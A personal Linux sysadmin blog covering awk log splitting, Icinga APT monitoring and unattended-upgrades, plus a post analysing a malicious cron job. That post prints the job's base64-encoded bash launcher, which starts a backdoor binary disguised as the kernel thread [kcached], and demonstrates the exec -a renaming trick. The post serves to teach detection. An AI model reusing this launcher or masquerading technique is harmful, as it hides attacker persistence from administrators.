Feuerfest

Just the private blog of a Linux sysadmin

How to properly split all logfile content based on timestamps - and realizing my own fallacy

Photo by Mikhail Nilov: https://www.pexels.com/photo/person-in-black-hoodie-using-a-computer-6963061/

I use a Pi-hole for DNS-based ad blocking in my home network. Additionally, I installed Unbound as a recursive DNS resolver on it. Meaning: I can use the Raspberry Pi in my home network as the DNS server for all my devices. This way I don't have to use my ISP's DNS servers, granting me some additional privacy. It also lets me see which DNS queries are sent by each device - leading to surprising revelations.

However, recently my internet connection was interrupted and afterwards I noticed that I couldn't access any site or service I connect to via a domain or hostname. And while the problem itself (dnsmasq: Maximum number of concurrent DNS queries reached (max: 150)) was fixed easily with a simple restart of the unbound service, I noticed that the /var/log/unbound/unbound.log logfile was uncompressed, unrotated and 3.3 gigabytes in size. Whoops. That's what happens when no logrotate job is present.

Side gig: A logrotate config for Unbound

Fixing this issue was rather easy. A short search additionally revealed that unbound-control has a log_reopen option which is a good idea to trigger after the rotation. This way Unbound properly closes the old filehandles and uses the new logfile.

root@pihole:~# cat /etc/logrotate.d/unbound
/var/log/unbound/unbound.log {
        monthly
        missingok
        rotate 12
        compress
        delaycompress
        notifempty
        sharedscripts
        create 644
        postrotate
                /usr/sbin/unbound-control log_reopen
        endscript
}
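
To verify the new config without actually rotating anything, logrotate can be run in debug mode - a dry-run that only prints what it would do:

root@pihole:~# logrotate -d /etc/logrotate.d/unbound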

But wait, there is more

However I had it on my list to dig deeper into the dnsmasq: Maximum number of concurrent DNS queries reached (max: 150) error in order to better understand the whole construct of Pi-hole, dnsmasq and Unbound.

However, the logfile was way too big to work with conveniently. 49,184,687 lines are just too much, especially on a Raspberry Pi with its comparatively limited CPU power. Now I could have just split it up after n lines using split -l number-of-lines, but:

  • That would be too easy and
  • I had recently encountered the need for a script which splits logfile lines based on a range of timestamps more than once

How to properly split a logfile - and overcomplicating stuff

Most of the unbound logfile lines will have the Unix timestamp in brackets, followed by the process name, the log level the message belongs to and the actual message.

root@pihole:~# head -n 1 /var/log/unbound/unbound.log
[1700653509] unbound[499:0] debug: module config: "subnetcache validator iterator"

However, some multi-line messages won't follow this format:

[1700798246] unbound[1506:0] info: incoming scrubbed packet: ;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 0
;; flags: qr aa ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
chat.cdn.whatsapp.net.  IN      A

;; ANSWER SECTION:
chat.cdn.whatsapp.net.  60      IN      A       157.240.252.61

;; AUTHORITY SECTION:

;; ADDITIONAL SECTION:
;; MSG SIZE  rcvd: 55

[1700798246] unbound[1506:0] debug: iter_handle processing q with state QUERY RESPONSE STATE

This means we need the following technical approach:

  1. Generate the Unix-timestamp for the first day in a month at 00:00:00 o'clock
    • Alternatively formulated: The Unix-timestamp for the first second of a month
  2. Generate the Unix-timestamp for the last day of the month at 23:59:59 o'clock
    • The last second of a month
  3. Find the first occurrence of the timestamp from point 1
  4. Find the last occurrence of the timestamp from point 2
  5. Use sed to move the lines for each month into a separate logfile

I will however also show an awk command for filtering based on the timestamps, useful for logfiles where every line is prefixed with a timestamp.

Calculating with date

Luckily date is powerful and easy to use for date calculations. %s gives us the Unix timestamp. We do not need to specify hours:minutes:seconds as date automatically assumes 00:00:00 for these values, giving us the first second of a day. And date also takes care of leap years and possibly a lot of other nuisances when it comes to time and date calculations.

To get the last second of a month we simply take the first day of the month, add a month and subtract one second. It couldn't be easier.

# Unix timestamp for the first second in a month
user@host:~$ date -d "$(date +%Y/%m/01)" "+%Y/%m/%d %X - %s"
2024/11/01 00:00:00 - 1730415600

# Unix timestamp for the last second in a month
user@host:~$ date -d "$(date +%Y/%m/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"
2024/11/30 23:59:59 - 1733007599

To verify the values we can use this for-loop. It will give us all the dates and timestamps we need to confirm that our commands are correct.

user@host:~$ for YEAR in {2023..2024}; do for MONTH in {1..12}; do echo -n "$(date -d "$(date +$YEAR/$MONTH/01)" "+%Y/%m/%d %X - %s")  "; date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"; done; done
2023/01/01 00:00:00 - 1672527600  2023/01/31 23:59:59 - 1675205999
2023/02/01 00:00:00 - 1675206000  2023/02/28 23:59:59 - 1677625199
2023/03/01 00:00:00 - 1677625200  2023/03/31 23:59:59 - 1680299999
2023/04/01 00:00:00 - 1680300000  2023/04/30 23:59:59 - 1682891999
2023/05/01 00:00:00 - 1682892000  2023/05/31 23:59:59 - 1685570399
2023/06/01 00:00:00 - 1685570400  2023/06/30 23:59:59 - 1688162399
2023/07/01 00:00:00 - 1688162400  2023/07/31 23:59:59 - 1690840799
2023/08/01 00:00:00 - 1690840800  2023/08/31 23:59:59 - 1693519199
2023/09/01 00:00:00 - 1693519200  2023/09/30 23:59:59 - 1696111199
2023/10/01 00:00:00 - 1696111200  2023/10/31 23:59:59 - 1698793199
2023/11/01 00:00:00 - 1698793200  2023/11/30 23:59:59 - 1701385199
2023/12/01 00:00:00 - 1701385200  2023/12/31 23:59:59 - 1704063599
2024/01/01 00:00:00 - 1704063600  2024/01/31 23:59:59 - 1706741999
2024/02/01 00:00:00 - 1706742000  2024/02/29 23:59:59 - 1709247599
2024/03/01 00:00:00 - 1709247600  2024/03/31 23:59:59 - 1711922399
2024/04/01 00:00:00 - 1711922400  2024/04/30 23:59:59 - 1714514399
2024/05/01 00:00:00 - 1714514400  2024/05/31 23:59:59 - 1717192799
2024/06/01 00:00:00 - 1717192800  2024/06/30 23:59:59 - 1719784799
2024/07/01 00:00:00 - 1719784800  2024/07/31 23:59:59 - 1722463199
2024/08/01 00:00:00 - 1722463200  2024/08/31 23:59:59 - 1725141599
2024/09/01 00:00:00 - 1725141600  2024/09/30 23:59:59 - 1727733599
2024/10/01 00:00:00 - 1727733600  2024/10/31 23:59:59 - 1730415599
2024/11/01 00:00:00 - 1730415600  2024/11/30 23:59:59 - 1733007599
2024/12/01 00:00:00 - 1733007600  2024/12/31 23:59:59 - 1735685999

To verify we can do the reverse (Unix timestamp to date) with the following command:

user@host:~$ date -d @1698793200
Wed  1 Nov 00:00:00 CET 2023

Solution solely working on timestamps

As the logfile timestamp is enclosed in brackets we need to tell awk to treat either [ or ] as a field separator. Then we can use awk to check if the second field is in a given time frame. For the first test run we define the variables manually in our shell and adjust the date commands to only output the Unix timestamp.

And as the logfile starts in November 2023 I set the values accordingly. awk then conveniently puts all lines whose timestamp is between these two values into a separate logfile.

user@host:~$ YEAR=2023
user@host:~$ MONTH=11
user@host:~$ FIRST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01)" "+%s")
user@host:~$ LAST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%s")
user@host:~$ awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 <= MAX) print}' /var/log/unbound/unbound.log >> /var/log/unbound/unbound-$YEAR-$MONTH.log

And this would already work fine if every line started with the timestamp. As this is not the case we need to add a bit more logic.

So the resulting script would look like this:

user@host:~$ cat date-split.sh
#!/bin/bash
# vim: set tabstop=2 smarttab shiftwidth=2 softtabstop=2 expandtab foldmethod=syntax :

# Split a logfile based on timestamps

LOGFILE="/var/log/unbound/unbound.log"
AWK="$(command -v awk)"
GZIP="$(command -v gzip)"

for YEAR in {2023..2024}; do
  for MONTH in {1..12}; do

    # Logfile starts November 2023 and ends November 2024 - don't grep for values before/after that time window
    if  [[ "$YEAR" -eq 2023 && "$MONTH" -gt 10 ]] ||  [[ "$YEAR" -eq 2024 && "$MONTH" -lt 12 ]]; then

      # Debug
      echo "$YEAR/$MONTH"

      # Calculate first and last second of each month
      FIRST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01)" "+%s")"
      LAST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01) + 1 month - 1 second" "+%s")"

      # Export variables so they are available in sub-shells (awk additionally gets them passed via -v)
      export FIRST_SECOND
      export LAST_SECOND

      # Split logfiles solely based on timestamps
      "$AWK" -F'[\\[\\]]' -v MIN="${FIRST_SECOND}" -v MAX="${LAST_SECOND}" '{if($2 >= MIN && $2 <= MAX) print}' "$LOGFILE" >> "/var/log/unbound/unbound-$YEAR-$MONTH.log"

      # Creating all those separate logfiles will probably fill up our diskspace
      #  therefore we gzip them immediately afterwards
      "$GZIP" "/var/log/unbound/unbound-$YEAR-$MONTH.log"

    fi

  done;
done

However, this script is vastly over-engineered. Why? Read on.

StackOverflow to the rescue

I still had the problem with the multi-line log messages. At first I wanted to use grep to get the matching first and last line numbers with head and tail. But uh.. yeah, I had a fallacy here, as this still wouldn't have worked with multi-line log messages lacking a timestamp. Also, using grep like this is highly inefficient. While it would be fine for a one-time script, I still hit a road block.

I just wasn't able to get awk to do what I wanted, so I resorted to asking my question on StackOverflow. Better to get input from others than to waste a lot of time.

awk to the rescue

It was only through the answer that I realized that my solution was a bit over-engineered. Why use date if you can use strftime to calculate the year and month from the timestamp directly? The initial answer was:

awk '
$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%m-%Y", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) close(f); prev = f
}
{
  print > f
}' unbound.log

How this works has been explained in detail on StackOverflow, so I just copy & paste it here.

For each line which first field is a [timestamp] (that is, matches regexp ^\[[0-9]+]$), we use substr and length to extract timestamp, strftime to convert it to a mm-YYYY string and assign "unbound-mm-YYYY.log" to variable f. In the second block, that applies to all lines, we print the current line in file f. Note: contrary to shell redirections, in awk, print > FILE appends to FILE.

Edit: as suggested by Ed Morton closing each file when we are done with it should significantly improve the performance if the total number of files is large. if (f != prev) close(f); prev = f added. Ed also noted that escaping the final ] in the regex is useless (and undefined behavior per POSIX). Backslash removed.

And this worked flawlessly. The generated monthly logfiles from my testfile matched exactly the line-numbers per month. Even multi-line log messages and empty lines were included.

All I then did was add gzip to compress each file directly before the next one is created, just to prevent filling up the disk completely. Additionally I changed the filename from unbound-MM-YYYY.log to unbound-YYYY-MM.log. Yes, the logfile name won't work with logrotate. But I just need the files to dig through them properly, and the year-month naming will be of great help here. Afterwards I don't need them anymore and will delete them. So this was of no concern to me.

This was my new working solution:

awk '$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%Y-%m", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) {
    if (prev) system("gzip " prev)
    close(prev)
    prev = f
  }
}
{
  print > f
}
END {
  if (prev) system("gzip " prev)
}' unbound.log

No bash script with convoluted logic needed. And easily usable for other logfiles too. Just adapt the starting regular expression to match the one the logfile uses and adapt the logic for strftime so the proper timestamp can be created.
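
As a sketch of what such an adaptation could look like - assuming a hypothetical logfile named mylog.log where each line starts with an ISO date such as 2024-11-30 23:59:59 - the date field already contains year and month, so strftime isn't even needed:

awk '
# Lines starting with an ISO date, e.g. "2024-11-30 23:59:59 some message"
$1 ~ /^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]$/ {
  # The first 7 characters of the date field are already "YYYY-MM"
  f = "mylog-" substr($1, 1, 7) ".log"
  if (f != prev) { if (prev) close(prev); prev = f }
}
{
  print > f
}' mylog.log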

Sometimes it's better to ask other people. 😄


Why basics matter

Photo by George Becker: https://www.pexels.com/photo/1-1-3-text-on-black-chalkboard-374918/

Someone on the Internet asked on Reddit what this CronJob does, as it looked strange.

{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random

And for most people in that subreddit several things were immediately obvious:

  1. The commands are obfuscated by encoding them in base64. A very common method to - sort of - hide malicious contents
  2. As such this is, most likely, a harmful, malicious CronJob not created by a legitimate user of that system
  3. The person asking lacks basic Linux knowledge as the |base64 -d|bash; part clearly states that the base64-string is decoded and piped into a bash process to be executed
    • Anyone with basic knowledge would simply have taken the string and piped it into base64 -d retrieving the decoded string for further analysis without executing it.

And if we do exactly that, we get the following decoded string:

user@host:~ $ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d
/usr/bin/pkill -0 -U1004 gs-dbus 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/admin/www/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/admin/www/gs-dbus'" 2>/dev/null

What these commands do is explained fairly simply. pkill checks (the -0 parameter) if a process named gs-dbus is already running under the user ID 1004. If a process is found pkill exits with 0 and everything after the || (logical OR) is not executed.

The right part of the OR is only executed when pkill exits with 1, i.e. when no process named gs-dbus is found. There a few environment variables and parameters are set, the process is started via the /home/admin/www/gs-dbus binary and then renamed to [kcached].
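
The exit code behaviour of pkill -0 is easy to verify yourself (the process name and user here are just examples; the first command assumes you are running a bash shell):

user@host:~$ pkill -0 -U "$(id -u)" bash; echo $?
0
user@host:~$ pkill -0 -U "$(id -u)" no-such-proc; echo $?
1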

And while this explains what is logically happening, it still doesn't explain what this CronJob actually does.

Now another person explained that it is the gs-dbus service from Gnome being started, if it isn't already running, and claimed it was probably safe. Why this person came to this conclusion is beyond me. Probably because https://gitlab.gnome.org/GNOME/gnome-software/-/blob/main/src/gs-dbus-helper.c shows up as a result if you just search for gs-dbus. But again this person overlooked some critical pieces of information.

And this made me take the time to write this little blogpost about how to approach such situations.

There are some crucial pieces of evidence which immediately tell me that this is not a legitimate piece of software.

  1. Base64-encoded strings which get executed via bash are almost never doing anything good
  2. If that software really belonged to Gnome you would have Systemd unit-files or timers. Or if that is a system without Systemd: good old init. But then again there would, most likely, be some kind of Gnome sub-process started by Gnome itself and not some obfuscated CronJob
  3. Renaming the process name to [kcached] makes it look like a kernel level thread. If there is an equivalent to "the world's biggest warning sign", this is it.
  4. The binary being started is /home/admin/www/gs-dbus. Notice www being the folder where the binary is stored? Yeah, this is usually an indicator that files in that folder are reachable via a webserver. Hence I assume that /home/admin/www/ hosts some vulnerable web application and that this was the entry point for the malicious software & CronJob.

What the person missed is: processes in square brackets are always kernel level threads, running as root and having a Parent Process ID (PPID) of 2. This means someone is renaming a process started by a non-root user to look like a kernel level thread - obviously to deceive the users and security mechanisms of that system. There is no legitimate reason to do so.

Would you investigate further or even kill that process when some scanning software reports a kernel level thread? Well, the obvious answer is: Of course, YES! But far too many inexperienced users won't.

All processes with [] around them are started by kthreadd - the Kernel Thread Daemon. kthreadd itself is started by the kernel during boot.

Therefore we have 3 truths about kernel level threads:

  1. They will always have the process ID 2 as their parent process ID (PPID)
  2. They will always run as root, never as a user
  3. They will always be started by [kthreadd] itself

Let's take a look at the following ps output from one of my Debian systems. I'll make it quick & dirty and simply grep for all processes with a [ in them.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
      3       2 root     rcu_gp          [rcu_gp]
      4       2 root     rcu_par_gp      [rcu_par_gp]
      5       2 root     slub_flushwq    [slub_flushwq]
      6       2 root     netns           [netns]
      8       2 root     kworker/0:0H-ev [kworker/0:0H-events_highpri]
     10       2 root     mm_percpu_wq    [mm_percpu_wq]
     11       2 root     rcu_tasks_kthre [rcu_tasks_kthread]
     12       2 root     rcu_tasks_rude_ [rcu_tasks_rude_kthread]
     13       2 root     rcu_tasks_trace [rcu_tasks_trace_kthread]
     14       2 root     ksoftirqd/0     [ksoftirqd/0]
     15       2 root     rcu_preempt     [rcu_preempt]
     16       2 root     migration/0     [migration/0]
     18       2 root     cpuhp/0         [cpuhp/0]
     19       2 root     cpuhp/1         [cpuhp/1]
     20       2 root     migration/1     [migration/1]
     21       2 root     ksoftirqd/1     [ksoftirqd/1]
     23       2 root     kworker/1:0H-ev [kworker/1:0H-events_highpri]
     24       2 root     cpuhp/2         [cpuhp/2]
     25       2 root     migration/2     [migration/2]
     26       2 root     ksoftirqd/2     [ksoftirqd/2]
     28       2 root     kworker/2:0H-ev [kworker/2:0H-events_highpri]
     29       2 root     cpuhp/3         [cpuhp/3]
     30       2 root     migration/3     [migration/3]
     31       2 root     ksoftirqd/3     [ksoftirqd/3]
     33       2 root     kworker/3:0H-ev [kworker/3:0H-events_highpri]
     38       2 root     kdevtmpfs       [kdevtmpfs]
     39       2 root     inet_frag_wq    [inet_frag_wq]
     40       2 root     kauditd         [kauditd]
     41       2 root     khungtaskd      [khungtaskd]
     42       2 root     oom_reaper      [oom_reaper]
     43       2 root     writeback       [writeback]
     44       2 root     kcompactd0      [kcompactd0]
     45       2 root     ksmd            [ksmd]
     46       2 root     khugepaged      [khugepaged]
     47       2 root     kintegrityd     [kintegrityd]
     48       2 root     kblockd         [kblockd]
     49       2 root     blkcg_punt_bio  [blkcg_punt_bio]
     50       2 root     tpm_dev_wq      [tpm_dev_wq]
     51       2 root     edac-poller     [edac-poller]
     52       2 root     devfreq_wq      [devfreq_wq]
     54       2 root     kworker/0:1H-kb [kworker/0:1H-kblockd]
     55       2 root     kswapd0         [kswapd0]
     62       2 root     kthrotld        [kthrotld]
     64       2 root     acpi_thermal_pm [acpi_thermal_pm]
     66       2 root     mld             [mld]
     67       2 root     ipv6_addrconf   [ipv6_addrconf]
     72       2 root     kstrp           [kstrp]
     78       2 root     zswap-shrink    [zswap-shrink]
     79       2 root     kworker/u9:0    [kworker/u9:0]
    123       2 root     kworker/1:1H-kb [kworker/1:1H-kblockd]
    133       2 root     kworker/2:1H-kb [kworker/2:1H-kblockd]
    152       2 root     kworker/3:1H-kb [kworker/3:1H-kblockd]
    154       2 root     ata_sff         [ata_sff]
    155       2 root     scsi_eh_0       [scsi_eh_0]
    156       2 root     scsi_tmf_0      [scsi_tmf_0]
    157       2 root     scsi_eh_1       [scsi_eh_1]
    158       2 root     scsi_tmf_1      [scsi_tmf_1]
    159       2 root     scsi_eh_2       [scsi_eh_2]
    160       2 root     scsi_tmf_2      [scsi_tmf_2]
    173       2 root     kdmflush/254:0  [kdmflush/254:0]
    175       2 root     kdmflush/254:1  [kdmflush/254:1]
    209       2 root     jbd2/dm-0-8     [jbd2/dm-0-8]
    210       2 root     ext4-rsv-conver [ext4-rsv-conver]
    341       2 root     cryptd          [cryptd]
    426       2 root     ext4-rsv-conver [ext4-rsv-conver]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 340800       2 root     kworker/0:0-cgw [kworker/0:0-cgwb_release]
 341004       2 root     kworker/1:1-eve [kworker/1:1-events]
 341535       2 root     kworker/1:2     [kworker/1:2]
 341837       2 root     kworker/2:0-mm_ [kworker/2:0-mm_percpu_wq]
 342029       2 root     kworker/2:1     [kworker/2:1]
 342136  141234 root     sshd            sshd: user [priv]
 342266       2 root     kworker/0:1-eve [kworker/0:1-events]
 342273       2 root     kworker/u8:0-fl [kworker/u8:0-flush-254:0]
 342274       2 root     kworker/3:0-ata [kworker/3:0-ata_sff]
 342278       2 root     kworker/u8:3-ev [kworker/u8:3-events_unbound]
 342279       2 root     kworker/3:1-ata [kworker/3:1-ata_sff]
 342307       2 root     kworker/u8:1-ev [kworker/u8:1-events_unbound]
 342308       2 root     kworker/3:2-eve [kworker/3:2-events]
 342310  342144 user     grep            grep --color=auto \[

Notice something?

There are only 4 processes not having a PPID of 2.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 342136  141234 root     sshd            sshd: user [priv]
 342310  342144 user     grep            grep --color=auto \[

One is [kthreadd] which actually owns PID 2 and was started by PPID 0, one is my grep command and the two others are from sshd - but only [kthreadd] is actually enclosed in square brackets as it doesn't contain any command line.

If I start a random process and rename it to [gs-dbus], similar to what the CronJob would do, it will show up in the following way:

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
324234  453452 admin     [gs-dbus] [gs-dbus]

PID 324234, PPID 453452 and running under the username admin. Nothing that matches the behaviour of a kernel level thread. And this should raise all red flags your mind possesses.
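
For reference, such a renamed process can be started with bash's exec -a - the same trick the decoded CronJob uses. Here sleep merely serves as a stand-in for the malicious binary:

user@host:~$ bash -c "exec -a '[gs-dbus]' sleep 3600" &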

And this is why basics are so important. Do not just assume a piece of software is doing nothing bad because "there is some legitimate software out there on the Internet sharing the same name". Anyone can lie. And the bad people most likely are.


How to monitor your APT-repositories with Icinga

Photo by Pixabay: https://www.pexels.com/photo/software-engineers-working-on-computers-256219/

During my series about unattended-upgrades (Part 1, Part 2) I noticed that a Debian mirror I use had been broken for 22 days, but I had nothing to notify me of this. As this also meant that unattended-upgrades didn't apply any patches, I wanted a check for this which in turn triggers unattended-upgrades when there are outstanding updates.

The problem

The monitoring-plugins package provides the check_apt plugin. This is normally used to check for available package updates. However, in the default configuration it doesn't execute an apt-get update as this requires root privileges. Personally I think the risk is worth the gain, as adding the -u parameter will execute an apt-get update and therefore check_apt will notify you when apt-get update finishes with a non-zero exit-code.

Take the following problem:

root@host:~# apt-get update
Hit:1 http://security.debian.org/debian-security bookworm-security InRelease
Hit:2 http://debian.tu-bs.de/debian bookworm InRelease
Get:3 http://debian.tu-bs.de/debian bookworm-updates InRelease [55.4 kB]
Reading package lists... Done
E: Release file for http://debian.tu-bs.de/debian/dists/bookworm-updates/InRelease is expired (invalid since 16d 0h 59min 33s). Updates for this repository will not be applied.

A mere check_apt won't notify you of any problems:

root@host:~# /usr/lib/nagios/plugins/check_apt
APT CRITICAL: 12 packages available for upgrade (12 critical updates). |available_upgrades=12;;;0 critical_updates=12;;;0

Making this go undetected.

Executed with the -u parameter however, we are notified of the problem:

root@host:~# /usr/lib/nagios/plugins/check_apt -u
'/usr/bin/apt-get -q update' exited with non-zero status.
APT CRITICAL: 12 packages available for upgrade (12 critical updates).  warnings detected, errors detected.|available_upgrades=12;;;0 critical_updates=12;;;0

The solution

Fixing this via Icinga is however a bit more complicated, as the standard apt CheckCommand from the Icinga Template Library (ITL) doesn't include the -u option and isn't prefixed with sudo despite root privileges being needed. This can be checked here: https://github.com/Icinga/icinga2/blob/master/itl/command-plugins.conf#L2155 or in your local /usr/share/icinga2/include/command-plugins.conf if you have Icinga installed.

The root cause is also the main problem I have with the check_apt CheckPlugin: check_apt is designed to actually install package updates when it reports outstanding available updates. This however breaks the number one paradigm I have regarding monitoring systems: they should not modify the system on their own. And when they do, they should do it in the same way as it is normally done. check_apt breaks this.

Maybe that person should have read a blog article about unattended-upgrades prior to writing that plugin? 😜

Normally you utilize Event Commands for that type of scenario: "If service X is in state Y execute event command Z."

The CheckCommand check_apt_update

Therefore I recommend creating your own check_apt_update CheckCommand and using that.

object CheckCommand "check_apt_update" {
        command = [ "/usr/bin/sudo", + PluginDir + "/check_apt" ]

        arguments = {
                "-u" = {
                        description = "Perform an apt-get update"
                }
        }
}

Defining the service and configuring the EventCommand

Then in your service definition add a suitable event_command:

apply Service "apt repositories" to Host {
  import "hourly-service"

  check_command = "check_apt_update"

  enable_event_handler = true
  // Execute unattended-upgrades automatically if service goes critical
  event_command = "execute_unattended_upgrades"
  // For services which should be executed ON the host itself
  command_endpoint = host.vars.agent_endpoint

  assign where host.vars.distribution == "Debian"

}

Creating the EventCommand

And create the EventCommand like this:

object EventCommand "execute_unattended_upgrades" {
  command = "sudo /usr/bin/unattended-upgrades"
}

Necessary sudo rights

This requires a sudo config file for the icinga2 user executing that command. And the commands must be executable without the need for a TTY, hence we end up with the following:

root@host:~# cat /etc/sudoers.d/icinga2
# This line disables the need for a tty for sudo
#  else we will get all kind of "sudo: a password is required" errors
Defaults:icinga2 !requiretty

# sudo rights for Icinga2
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrades
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrade
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/apt-get
icinga2  ALL=(ALL) NOPASSWD: /usr/lib/nagios/plugins/check_apt

Conclusion

This is now sufficient as I'm notified when something prevents APT from properly updating the package lists. APT itself takes care to validate the various entries inside the Release file and exits with a non-zero exit-code, so there is no need to put that logic inside of check_apt.

Setting up similar checks for other monitoring systems is of course also possible. In general, raising an alarm when apt-get update exits with a non-zero exit-code is a somewhat foolproof method.
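
A minimal sketch of such a check - wording and paths are just an example - usable with any monitoring system that understands Nagios-style exit codes:

#!/bin/bash
# Report CRITICAL (exit 2) when 'apt-get update' fails, OK (exit 0) otherwise.
# Needs to run as root (or via sudo) as apt-get update requires root privileges.
if ! /usr/bin/apt-get -q update >/dev/null 2>&1; then
  echo "CRITICAL: 'apt-get -q update' exited with a non-zero status"
  exit 2
fi
echo "OK: package lists updated successfully"
exit 0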


Using and configuring unattended-upgrades under Debian Bookworm - Part 2: Practise

Photo by Markus Winkler: https://www.pexels.com/photo/the-word-update-is-spelled-out-in-scrabble-tiles-18524143/

Preface

At the time of this writing Debian Bookworm is the stable release of Debian. It utilizes Systemd timers for all automation tasks such as the updating of the package lists and execution of the actual apt-get upgrade. Therefore we won't need to configure APT-Parameters in files like /etc/apt/apt.conf.d/02periodic. In fact some of these files don't even exist on my systems. Keep that in mind if you read this article along with others, who might do things differently - or for older/newer releases of Debian.

Part 1 where I talk about the basics and prerequisites of unattended-upgrades along with many questions you should have answered prior using it is here: Using and configuring unattended-upgrades under Debian Bookworm - Part 1: Preparations

Note: As it took me considerably longer than expected to write this post, please ignore discrepancies in timestamps and versions.

Installing unattended-upgrades - however it's (most likely) not active yet

Enough with the theory, let's switch to the shell. The installation is rather easy, a simple apt-get install unattended-upgrades is enough. However, if you run the installation in an interactive way like this, unattended-upgrades isn't configured to run automatically: the file /etc/apt/apt.conf.d/20auto-upgrades is missing. So check if it is present!

Note: That's one reason why you want to set the environment variable export DEBIAN_FRONTEND=noninteractive prior to the installation in your Ansible Playbooks/Puppet Manifests/Runbooks/Scripts, etc. or execute a dpkg-reconfigure -f noninteractive unattended-upgrades after the installation. Of course placing the file manually also solves the problem. 😉

If you want to re-configure unattended-upgrades manually, execute dpkg-reconfigure unattended-upgrades and select yes at the prompt. But I advise you not to do that just yet.

root@host:~# apt-get install unattended-upgrades
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  gir1.2-glib-2.0 libgirepository-1.0-1 python3-dbus python3-distro-info python3-gi
Suggested packages:
  python-dbus-doc bsd-mailx default-mta | mail-transport-agent needrestart powermgmt-base
The following NEW packages will be installed:
  gir1.2-glib-2.0 libgirepository-1.0-1 python3-dbus python3-distro-info python3-gi unattended-upgrades
0 upgraded, 6 newly installed, 0 to remove and 50 not upgraded.
Need to get 645 kB of archives.
After this operation, 2,544 kB of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://debian.tu-bs.de/debian bookworm/main amd64 libgirepository-1.0-1 amd64 1.74.0-3 [101 kB]
Get:2 http://debian.tu-bs.de/debian bookworm/main amd64 gir1.2-glib-2.0 amd64 1.74.0-3 [159 kB]
Get:3 http://debian.tu-bs.de/debian bookworm/main amd64 python3-dbus amd64 1.3.2-4+b1 [95.1 kB]
Get:4 http://debian.tu-bs.de/debian bookworm/main amd64 python3-distro-info all 1.5+deb12u1 [6,772 B]
Get:5 http://debian.tu-bs.de/debian bookworm/main amd64 python3-gi amd64 3.42.2-3+b1 [219 kB]
Get:6 http://debian.tu-bs.de/debian bookworm/main amd64 unattended-upgrades all 2.9.1+nmu3 [63.3 kB]
Fetched 645 kB in 0s (1,618 kB/s)
Preconfiguring packages ...
Selecting previously unselected package libgirepository-1.0-1:amd64.
(Reading database ... 33397 files and directories currently installed.)
Preparing to unpack .../0-libgirepository-1.0-1_1.74.0-3_amd64.deb ...
Unpacking libgirepository-1.0-1:amd64 (1.74.0-3) ...
Selecting previously unselected package gir1.2-glib-2.0:amd64.
Preparing to unpack .../1-gir1.2-glib-2.0_1.74.0-3_amd64.deb ...
Unpacking gir1.2-glib-2.0:amd64 (1.74.0-3) ...
Selecting previously unselected package python3-dbus.
Preparing to unpack .../2-python3-dbus_1.3.2-4+b1_amd64.deb ...
Unpacking python3-dbus (1.3.2-4+b1) ...
Selecting previously unselected package python3-distro-info.
Preparing to unpack .../3-python3-distro-info_1.5+deb12u1_all.deb ...
Unpacking python3-distro-info (1.5+deb12u1) ...
Selecting previously unselected package python3-gi.
Preparing to unpack .../4-python3-gi_3.42.2-3+b1_amd64.deb ...
Unpacking python3-gi (3.42.2-3+b1) ...
Selecting previously unselected package unattended-upgrades.
Preparing to unpack .../5-unattended-upgrades_2.9.1+nmu3_all.deb ...
Unpacking unattended-upgrades (2.9.1+nmu3) ...
Setting up python3-dbus (1.3.2-4+b1) ...
Setting up libgirepository-1.0-1:amd64 (1.74.0-3) ...
Setting up python3-distro-info (1.5+deb12u1) ...
Setting up unattended-upgrades (2.9.1+nmu3) ...

Creating config file /etc/apt/apt.conf.d/50unattended-upgrades with new version
